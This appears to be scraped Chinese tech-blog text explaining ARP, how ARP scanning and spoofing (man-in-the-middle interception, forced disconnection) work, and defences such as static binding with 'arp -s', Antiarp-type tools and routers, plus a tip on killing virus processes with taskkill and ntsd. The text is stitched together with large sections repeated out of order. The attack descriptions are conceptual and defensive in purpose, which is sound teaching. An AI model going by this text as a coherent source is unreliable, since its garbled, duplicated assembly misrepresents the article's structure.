3.1静态绑定
最常用的方法就是做IP和MAC静态绑定,在网内把主机和网关都做IP和MAC绑定。
欺骗是通过ARP的动态实时的规则欺骗内网机器,所以我们把ARP全部设置为静态可以解决对内网PC的欺骗,同时在网关也要进行IP和MAC的静态绑定,这样双向绑定才比较保险。
方法:
对每台主机进行IP和MAC地址静态绑定。
通过命令,arp -s可以实现 “arp –s IP MAC地址 ”。
例如:“arp –s192.168.10.1 AA-AA-AA-AA-AA-AA”。
如果设置成功会在PC上面通过执行arp -a 可以看到相关的提示: Internet Address Physical Address Type
192.168.10.1AA-AA-AA-AA-AA-AA static(静态)
一般不绑定,在动态的情况下:
Internet AddressPhysical AddressType
192.168.10.1 AA-AA-AA-AA-AA-AA dynamic(动态)
说明:对于网络中有很多主机,500台,1000台...,如果我们这样每一台都去做静态绑定,工作量是非常大的。。。。,这种静态绑定,在电脑每次重起后,都必须重新在绑定,虽然也可以做一个批处理文件,但是还是比较麻烦的!
3.2使用ARP防护软件
目前关于ARP类的防护软件出的比较多了,大家使用比较常用的ARP工具主要是欣向ARP工具,Antiarp等。它们除了本身来检测出ARP攻击外,防护的工作原理是一定频率向网络广播正确的ARP信息。我们还是来简单说下这两个小工具。
3.2.1欣向ARP工具
俺使用了该工具,它有5个功能:
A. IP/MAC清单
选择网卡。如果是单网卡不需要设置。如果是多网卡需要设置连接内网的那块网卡。
IP/MAC扫描。这里会扫描目前网络中所有的机器的IP与MAC地址。请在内网运行正常时扫描,因为这个表格将作为对之后ARP的参照。
之后的功能都需要这个表格的支持,如果出现提示无法获取IP或MAC时,就说明这里的表格里面没有相应的数据。
B.ARP欺骗检测
这个功能会一直检测内网是否有PC冒充表格内的IP。你可以把主要的IP设到检测表格里面,例如,路由器,电影服务器,等需要内网机器访问的机器IP。
(补充)“ARP欺骗记录”表如何理解:
“Time”:发现问题时的时间;
“sender”:发送欺骗信息的IP或MAC;
“Repeat”:欺诈信息发送的次数;
“ARP info”:是指发送欺骗信息的具体内容.如下面例子:
timesenderRepeatARP info 22:22:22192.168.1.22 1433192.168.1.1 is at 00:0e:03:22:02:e8
这条信息的意思是:在22:22:22的时间,检测到由192.168.1.22发出的欺骗信息,已经发送了1433次,他发送的欺骗信息的内容是:192.168.1.1的MAC地址是00:0e:03:22:02:e8。
打开检测功能,如果出现针对表内IP的欺骗,会出现提示。可以按照提示查到内网的ARP欺骗的根源。提示一句,任何机器都可以冒充其他机器发送IP与MAC,所以即使提示出某个IP或MAC在发送欺骗信息,也未必是100%的准确。所有请不要以暴力解决某些问题。
C.主动维护
这个功能可以直接解决ARP欺骗的掉线问题,但是并不是理想方法。他的原理就在网络内不停的广播制定的IP的正确的MAC地址。
“制定维护对象”的表格里面就是设置需要保护的IP。发包频率就是每秒发送多少个正确的包给网络内所有机器。强烈建议尽量少的广播IP,尽量少的广播频率。一般设置1次就可以,如果没有绑定IP的情况下,出现ARP欺骗,可以设置到50-100次,如果还有掉线可以设置更高,即可以实现快速解决ARP欺骗的问题。但是想真正解决ARP问题,还是请参照上面绑定方法。
D. 欣向路由器日志
收集欣向路由器的系统日志,等功能。
E.抓包
类似于网络分析软件的抓包,保存格式是.cap。
3.2.1Antiarp
这个软件界面比较简单,以下为我收集该软件的使用方法。
A.填入网关IP地址,点击[获取网关地址]将会显示出网关的MAC地址。点击[自动防护]即可保护当前网卡与该网关的通信不会被第三方监听。注意:如出现ARP欺骗提示,这说明攻击者发送了ARP欺骗数据包来获取网卡的数据包,如果您想追踪攻击来源请记住攻击者的MAC地址,利用MAC地址扫描器可以找出IP 对应的MAC地址.
B.IP地址冲突
如频繁的出现IP地址冲突,这说明攻击者频繁发送ARP欺骗数据包,才会出现IP冲突的警告,利用Anti ARP Sniffer可以防止此类攻击。
C.您需要知道冲突的MAC地址,Windows会记录这些错误。查看具体方法如下:
右击[我的电脑]--[管理]--点击[事件查看器]--点击[系统]--查看来源为[TcpIP]---双击事件可以看到显示地址发生冲突,并记录了该MAC地址,请复制该MAC地址并填入Anti ARP Sniffer的本地MAC地址输入框中(请注意将:转换为-),输入完成之后点击[防护地址冲突],为了使MAC地址生效请禁用本地网卡然后再启用网卡,在CMD命令行中输入Ipconfig /all,查看当前MAC地址是否与本地MAC地址输入框中的MAC地址相符,如果更改失败请与我联系。如果成功将不再会显示地址冲突。
注意:如果您想恢复默认MAC地址,请点击[恢复默认],为了使MAC地址生效请禁用本地网卡然后再启用网卡。
3.3具有ARP防护功能的路由器
这类路由器以前听说的很少,对于这类路由器中提到的ARP防护功能,其实它的原理就是定期的发送自己正确的ARP信息。但是路由器的这种功能对于真正意义上的攻击,是不能解决的。
ARP的最常见的特征就是掉线,一般情况下不需要处理一定时间内可以回复正常上网,因为ARP欺骗是有老化时间的,过了老化时间就会自动的回复正常。现在大多数路由器都会在很短时间内不停广播自己的正确ARP信息,使受骗的主机回复正常。但是如果出现攻击性ARP欺骗(其实就是时间很短的量很大的欺骗ARP,1秒有个几百上千的),它是不断的发起ARP欺骗包来阻止内网机器上网,即使路由器不断广播正确的包也会被他大量的错误信息给淹没。
可能你会有疑问:我们也可以发送比欺骗者更多更快正确的ARP信息啊?如果攻击者每秒发送1000个ARP欺骗包,那我们就每秒发送1500个正确的ARP信息!
面对上面的疑问,我们仔细想想,如果网络拓扑很大,网络中接了很多网络设备和主机,大量的设备都去处理这些广播信息,那网络使用起来好不爽,再说了会影响到我们工作和学习。ARP广播会造成网络资源的浪费和占用。如果该网络出了问题,我们抓包分析,数据包中也会出现很多这类ARP广播包,对分析也会造成一定的影响。
...
咱们谈ARP之前,还是先要知道ARP的概念和工作原理,理解了原理知识,才能更好去面对和分析处理问题。
1.1ARP概念知识
ARP,全称Address Resolution Protocol,中文名为地址解析协议,它工作在数据链路层,在本层和硬件接口联系,同时对上层提供服务。
IP数据包常通过以太网发送,以太网设备并不识别32位IP地址,它们是以48位以太网地址传输以太网数据包。因此,必须把IP目的地址转换成以太网目的地址。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。ARP协议用于将网络中的IP地址解析为的硬件地址(MAC地址),以保证通信的顺利进行。
1.2ARP工作原理
首先,每台主机都会在自己的ARP缓冲区中建立一个 ARP列表,以表示IP地址和MAC地址的对应关系。当源主机需要将一个数据包要发送到目的主机时,会首先检查自己 ARP列表中是否存在该 IP地址对应的MAC地址,如果有﹐就直接将数据包发送到这个MAC地址;如果没有,就向本地网段发起一个ARP请求的广播包,查询此目的主机对应的MAC地址。此ARP请求数据包里包括源主机的IP地址、硬件地址、以及目的主机的IP地址。网络中所有的主机收到这个ARP请求后,会检查数据包中的目的IP是否和自己的IP地址一致。如果不相同就忽略此数据包;如果相同,该主机首先将发送端的MAC地址和IP地址添加到自己的ARP列表中,如果ARP表中已经存在该IP的信息,则将其覆盖,然后给源主机发送一个 ARP响应数据包,告诉对方自己是它需要查找的MAC地址;源主机收到这个ARP响应数据包后,将得到的目的主机的IP地址和MAC地址添加到自己的ARP列表中,并利用此信息开始数据的传输。如果源主机一直没有收到ARP响应数据包,表示ARP查询失败。
例如:
A的地址为:IP:192.168.10.1 MAC: AA-AA-AA-AA-AA-AA
B的地址为:IP:192.168.10.2 MAC: BB-BB-BB-BB-BB-BB
根据上面的所讲的原理,我们简单说明这个过程:A要和B通讯,A就需要知道B的以太网地址,于是A发送一个ARP请求广播(谁是192.168.10.2 ,请告诉192.168.10.1),当B收到该广播,就检查自己,结果发现和自己的一致,然后就向A发送一个ARP单播应答(192.168.10.2 在BB-BB-BB-BB-BB-BB)。
1.3ARP通讯模式
通讯模式(Pattern Analysis):在网络分析中,通讯模式的分析是很重要的,不同的协议和不同的应用都会有不同的通讯模式。更有些时候,相同的协议在不同的企业应用中也会出现不同的通讯模式。ARP在正常情况下的通讯模式应该是:请求 -> 应答 -> 请求 -> 应答,也就是应该一问一答。
二、常见ARP攻击类型
个人认为常见的ARP攻击为两种类型:ARP扫描和ARP欺骗。
2.1ARP扫描(ARP请求风暴)
通讯模式(可能):
请求 -> 请求 -> 请求 -> 请求 -> 请求 -> 请求 -> 应答 -> 请求 -> 请求 -> 请求...
描述:
网络中出现大量ARP请求广播包,几乎都是对网段内的所有主机进行扫描。大量的ARP请求广播可能会占用网络带宽资源;ARP扫描一般为ARP攻击的前奏。
出现原因(可能):
病毒程序,侦听程序,扫描程序。
如果网络分析软件部署正确,可能是我们只镜像了交换机上的部分端口,所以大量ARP请求是来自与非镜像口连接的其它主机发出的。
如果部署不正确,这些ARP请求广播包是来自和交换机相连的其它主机。
2.2ARP欺骗
ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候,就会对本地的ARP缓存进行更新,将应答中的IP和MAC地址存储在ARP缓存中。所以在网络中,有人发送一个自己伪造的ARP应答,网络可能就会出现问题。这可能就是协议设计者当初没考虑到的!
2.2.1欺骗原理
假设一个网络环境中,网内有三台主机,分别为主机A、B、C。主机详细信息如下描述:
A的地址为:IP:192.168.10.1 MAC: AA-AA-AA-AA-AA-AA
B的地址为:IP:192.168.10.2 MAC: BB-BB-BB-BB-BB-BB
C的地址为:IP:192.168.10.3 MAC: CC-CC-CC-CC-CC-CC
正常情况下A和C之间进行通讯,但是此时B向A发送一个自己伪造的ARP应答,而这个应答中的数据为发送方IP地址是192.168.10.3(C的IP地址),MAC地址是BB-BB-BB-BB-BB-BB(C的MAC地址本来应该是CC-CC-CC-CC-CC-CC,这里被伪造了)。当A接收到B伪造的ARP应答,就会更新本地的ARP缓存(A被欺骗了),这时B就伪装成C了。同时,B同样向C发送一个ARP应答,应答包中发送方IP地址四192.168.10.1(A的IP地址),MAC地址是BB-BB-BB-BB-BB-BB(A的MAC地址本来应该是AA-AA-AA-AA-AA-AA),当C收到B伪造的ARP应答,也会更新本地ARP缓存(C也被欺骗了),这时B就伪装成了A。这样主机A和C都被主机B欺骗,A和C之间通讯的数据都经过了B。主机B完全可以知道他们之间说的什么:)。这就是典型的ARP欺骗过程。
注意:一般情况下,ARP欺骗的某一方应该是网关。
2.2.2两种情况
ARP欺骗存在两种情况:一种是欺骗主机作为“中间人”,被欺骗主机的数据都经过它中转一次,这样欺骗主机可以窃取到被它欺骗的主机之间的通讯数据;另一种让被欺骗主机直接断网。
◆第一种:窃取数据(嗅探)
通讯模式:
应答 -> 应答 -> 应答 -> 应答 -> 应答 -> 请求 -> 应答 -> 应答 ->请求->应答...
描述:
这种情况就属于我们上面所说的典型的ARP欺骗,欺骗主机向被欺骗主机发送大量伪造的ARP应答包进行欺骗,当通讯双方被欺骗成功后,自己作为了一个“中间人“的身份。此时被欺骗的主机双方还能正常通讯,只不过在通讯过程中被欺骗者“窃听”了。
出现原因(可能):
木马病毒
嗅探
人为欺骗
◆第二种:导致断网
通讯模式:
应答 -> 应答 -> 应答 -> 应答 -> 应答 -> 应答 -> 请求…
描述:
这类情况就是在ARP欺骗过程中,欺骗者只欺骗了其中一方,如B欺骗了A,但是同时B没有对C进行欺骗,这样A实质上是在和B通讯,所以A就不能和C通讯了,另外一种情况还可能就是欺骗者伪造一个不存在地址进行欺骗。
对于伪造地址进行的欺骗,在排查上比较有难度,这里最好是借用TAP设备(呵呵,这个东东好像有点贵勒),分别捕获单向数据流进行分析!
出现原因(可能):
木马病毒
人为破坏
一些网管软件的控制功能
三、常用的防护方法
搜索网上,目前对于ARP攻击防护问题出现最多是绑定IP和MAC和使用ARP防护软件,也出现了具有ARP防护功能的路由器。呵呵,我们来了解下这三种方法。
3.1静态绑定
最常用的方法就是做IP和MAC静态绑定,在网内把主机和网关都做IP和MAC绑定。
欺骗是通过ARP的动态实时的规则欺骗内网机器,所以我们把ARP全部设置为静态可以解决对内网PC的欺骗,同时在网关也要进行IP和MAC的静态绑定,这样双向绑定才比较保险。
方法:
对每台主机进行IP和MAC地址静态绑定。
通过命令,arp -s可以实现 “arp –s IP MAC地址 ”。
例如:“arp –s192.168.10.1 AA-AA-AA-AA-AA-AA”。
如果设置成功会在PC上面通过执行arp -a 可以看到相关的提示: Internet Address Physical Address Type
192.168.10.1AA-AA-AA-AA-AA-AA static(静态)
一般不绑定,在动态的情况下:
Internet AddressPhysical AddressType
192.168.10.1 AA-AA-AA-AA-AA-AA dynamic(动态)
说明:对于网络中有很多主机,500台,1000台...,如果我们这样每一台都去做静态绑定,工作量是非常大的。。。。,这种静态绑定,在电脑每次重起后,都必须重新在绑定,虽然也可以做一个批处理文件,但是还是比较麻烦的!
3.2使用ARP防护软件
目前关于ARP类的防护软件出的比较多了,大家使用比较常用的ARP工具主要是欣向ARP工具,Antiarp等。它们除了本身来检测出ARP攻击外,防护的工作原理是一定频率向网络广播正确的ARP信息。我们还是来简单说下这两个小工具。
3.2.1欣向ARP工具
俺使用了该工具,它有5个功能:
A. IP/MAC清单
选择网卡。如果是单网卡不需要设置。如果是多网卡需要设置连接内网的那块网卡。
IP/MAC扫描。这里会扫描目前网络中所有的机器的IP与MAC地址。请在内网运行正常时扫描,因为这个表格将作为对之后ARP的参照。
之后的功能都需要这个表格的支持,如果出现提示无法获取IP或MAC时,就说明这里的表格里面没有相应的数据。
B.ARP欺骗检测
这个功能会一直检测内网是否有PC冒充表格内的IP。你可以把主要的IP设到检测表格里面,例如,路由器,电影服务器,等需要内网机器访问的机器IP。
(补充)“ARP欺骗记录”表如何理解:
“Time”:发现问题时的时间;
“sender”:发送欺骗信息的IP或MAC;
“Repeat”:欺诈信息发送的次数;
“ARP info”:是指发送欺骗信息的具体内容.如下面例子:
timesenderRepeatARP info 22:22:22192.168.1.22 1433192.168.1.1 is at 00:0e:03:22:02:e8
这条信息的意思是:在22:22:22的时间,检测到由192.168.1.22发出的欺骗信息,已经发送了1433次,他发送的欺骗信息的内容是:192.168.1.1的MAC地址是00:0e:03:22:02:e8。
打开检测功能,如果出现针对表内IP的欺骗,会出现提示。可以按照提示查到内网的ARP欺骗的根源。提示一句,任何机器都可以冒充其他机器发送IP与MAC,所以即使提示出某个IP或MAC在发送欺骗信息,也未必是100%的准确。所有请不要以暴力解决某些问题。
C.主动维护
这个功能可以直接解决ARP欺骗的掉线问题,但是并不是理想方法。他的原理就在网络内不停的广播制定的IP的正确的MAC地址。
“制定维护对象”的表格里面就是设置需要保护的IP。发包频率就是每秒发送多少个正确的包给网络内所有机器。强烈建议尽量少的广播IP,尽量少的广播频率。一般设置1次就可以,如果没有绑定IP的情况下,出现ARP欺骗,可以设置到50-100次,如果还有掉线可以设置更高,即可以实现快速解决ARP欺骗的问题。但是想真正解决ARP问题,还是请参照上面绑定方法。
D. 欣向路由器日志
收集欣向路由器的系统日志,等功能。
E.抓包
类似于网络分析软件的抓包,保存格式是.cap。
3.2.1Antiarp
这个软件界面比较简单,以下为我收集该软件的使用方法。
A.填入网关IP地址,点击[获取网关地址]将会显示出网关的MAC地址。点击[自动防护]即可保护当前网卡与该网关的通信不会被第三方监听。注意:如出现ARP欺骗提示,这说明攻击者发送了ARP欺骗数据包来获取网卡的数据包,如果您想追踪攻击来源请记住攻击者的MAC地址,利用MAC地址扫描器可以找出IP 对应的MAC地址.
B.IP地址冲突
如频繁的出现IP地址冲突,这说明攻击者频繁发送ARP欺骗数据包,才会出现IP冲突的警告,利用Anti ARP Sniffer可以防止此类攻击。
C.您需要知道冲突的MAC地址,Windows会记录这些错误。查看具体方法如下:
右击[我的电脑]--[管理]--点击[事件查看器]--点击[系统]--查看来源为[TcpIP]---双击事件可以看到显示地址发生冲突,并记录了该MAC地址,请复制该MAC地址并填入Anti ARP Sniffer的本地MAC地址输入框中(请注意将:转换为-),输入完成之后点击[防护地址冲突],为了使MAC地址生效请禁用本地网卡然后再启用网卡,在CMD命令行中输入Ipconfig /all,查看当前MAC地址是否与本地MAC地址输入框中的MAC地址相符,如果更改失败请与我联系。如果成功将不再会显示地址冲突。
注意:如果您想恢复默认MAC地址,请点击[恢复默认],为了使MAC地址生效请禁用本地网卡然后再启用网卡。
3.3具有ARP防护功能的路由器
这类路由器以前听说的很少,对于这类路由器中提到的ARP防护功能,其实它的原理就是定期的发送自己正确的ARP信息。但是路由器的这种功能对于真正意义上的攻击,是不能解决的。
ARP的最常见的特征就是掉线,一般情况下不需要处理一定时间内可以回复正常上网,因为ARP欺骗是有老化时间的,过了老化时间就会自动的回复正常。现在大多数路由器都会在很短时间内不停广播自己的正确ARP信息,使受骗的主机回复正常。但是如果出现攻击性ARP欺骗(其实就是时间很短的量很大的欺骗ARP,1秒有个几百上千的),它是不断的发起ARP欺骗包来阻止内网机器上网,即使路由器不断广播正确的包也会被他大量的错误信息给淹没。
可能你会有疑问:我们也可以发送比欺骗者更多更快正确的ARP信息啊?如果攻击者每秒发送1000个ARP欺骗包,那我们就每秒发送1500个正确的ARP信息!
面对上面的疑问,我们仔细想想,如果网络拓扑很大,网络中接了很多网络设备和主机,大量的设备都去处理这些广播信息,那网络使用起来好不爽,再说了会影响到我们工作和学习。ARP广播会造成网络资源的浪费和占用。如果该网络出了问题,我们抓包分析,数据包中也会出现很多这类ARP广播包,对分析也会造成一定的影响。
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
杀毒的时候我们会遇到这种情况,有些病毒怎么杀也杀不掉。杀毒软件告诉我们重启后才能清除,结果重启后病毒依然如故。那么,怎么对付这种病毒呢?笔者在这里为大家提供两则小技巧,以便帮你强行杀死这种“顽固不化”的病毒进程。
根据进程名查杀
这种方法是通过WinXP系统下的taskkill命令来实现的,在使用该方法之前,首先需要打开系统的进程列表界面,找到病毒进程所对应的具体进程名。
接着依次单击“开始→运行”命令,在弹出的系统运行框中,运行“cmd”命令;再在DOS命令行中输入“taskkill /im aaa”格式的字符串命令,单击回车键后,顽固的病毒进程“aaa”就被强行杀死了。比方说,要强行杀死“conime.exe”病毒进程,只要在命令提示符下执行“taskkill /im conime.exe”命令,要不了多久,系统就会自动返回结果。
根据进程号查杀
上面的方法,只对部分病毒进程有效,遇到一些更“顽固”的病毒进程,可能就无济于事了。此时你可以通过Win2000以上系统的内置命令——ntsd,来强行杀死一切病毒进程,因为该命令除System进程、SMSS.EXE进程、CSRSS.EXE进程不能“对付”外,基本可以对付其它一切进程。但是在使用该命令杀死病毒进程之前,需要先查找到对应病毒进程的具体进程号。
考虑到系统进程列表界面在默认状态下,是不显示具体进程号的,因此你可以首先打开系统任务管理器窗口,再单击“查看”菜单项下面的“选择列”命令,在弹出的设置框中,将“PID(进程标志符)”选项选中,单击“确定”按钮。返回到系统进程列表页面中后,你就能查看到对应病毒进程的具体PID了。
接着打开系统运行对话框,在其中运行“cmd”命令,在命令提示符状态下输入“ntsd -c q -p PID”命令,就可以强行将指定PID的病毒进程杀死了。例如,发现某个病毒进程的PID为“444”,那么可以执行“ntsd -c q -p 444”命令,来杀死这个病毒进程。
...
根据进程名查杀
这种方法是通过WinXP系统下的taskkill命令来实现的,在使用该方法之前,首先需要打开系统的进程列表界面,找到病毒进程所对应的具体进程名。
接着依次单击“开始→运行”命令,在弹出的系统运行框中,运行“cmd”命令;再在DOS命令行中输入“taskkill /im aaa”格式的字符串命令,单击回车键后,顽固的病毒进程“aaa”就被强行杀死了。比方说,要强行杀死“conime.exe”病毒进程,只要在命令提示符下执行“taskkill /im conime.exe”命令,要不了多久,系统就会自动返回结果。
根据进程号查杀
上面的方法,只对部分病毒进程有效,遇到一些更“顽固”的病毒进程,可能就无济于事了。此时你可以通过Win2000以上系统的内置命令——ntsd,来强行杀死一切病毒进程,因为该命令除System进程、SMSS.EXE进程、CSRSS.EXE进程不能“对付”外,基本可以对付其它一切进程。但是在使用该命令杀死病毒进程之前,需要先查找到对应病毒进程的具体进程号。
考虑到系统进程列表界面在默认状态下,是不显示具体进程号的,因此你可以首先打开系统任务管理器窗口,再单击“查看”菜单项下面的“选择列”命令,在弹出的设置框中,将“PID(进程标志符)”选项选中,单击“确定”按钮。返回到系统进程列表页面中后,你就能查看到对应病毒进程的具体PID了。
接着打开系统运行对话框,在其中运行“cmd”命令,在命令提示符状态下输入“ntsd -c q -p PID”命令,就可以强行将指定PID的病毒进程杀死了。例如,发现某个病毒进程的PID为“444”,那么可以执行“ntsd -c q -p 444”命令,来杀死这个病毒进程。
...
